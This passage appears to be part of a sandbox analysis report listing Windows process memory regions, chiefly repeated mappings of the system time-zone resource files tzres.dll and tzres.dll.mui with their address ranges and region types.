name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2705
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2706
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2707
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2708
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2709
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2710
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2711
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2712
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2713
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2714
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2715
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2716
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2717
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2718
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2719
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2720
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2721
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2722
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2723
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2724
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2725
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2726
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2727
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2728
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2729
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2730
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2731
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2732
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2733
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2734
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2735
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2736
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2737
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2738
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2739
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2740
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2741
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2742
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2743
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2744
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2745
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2746
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2747
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2748
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2749
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2750
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2751
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2752
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2753
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2754
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2755
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2756
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2757
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2758
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2759
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2760
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2761
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2762
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2763
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2764
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2765
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2766
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2767
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2768
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2769
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2770
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2771
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2772
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2773
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2774
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2775
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2776
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2777
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2778
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2779
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2780
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2781
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2782
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2783
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2784
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2785
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2786
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2787
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2788
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2789
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2790
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2791
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2792
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2793
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2794
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2795
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2796
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2797
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2798
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2799
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2800
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2801
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2802
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2803
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2804
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2805
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2806
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2807
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2808
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2809
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2810
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2811
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2812
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2813
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2814
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2815
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2816
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2817
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2818
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2819
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2820
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2822
start_va = 0xa60000
end_va = 0xa62fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
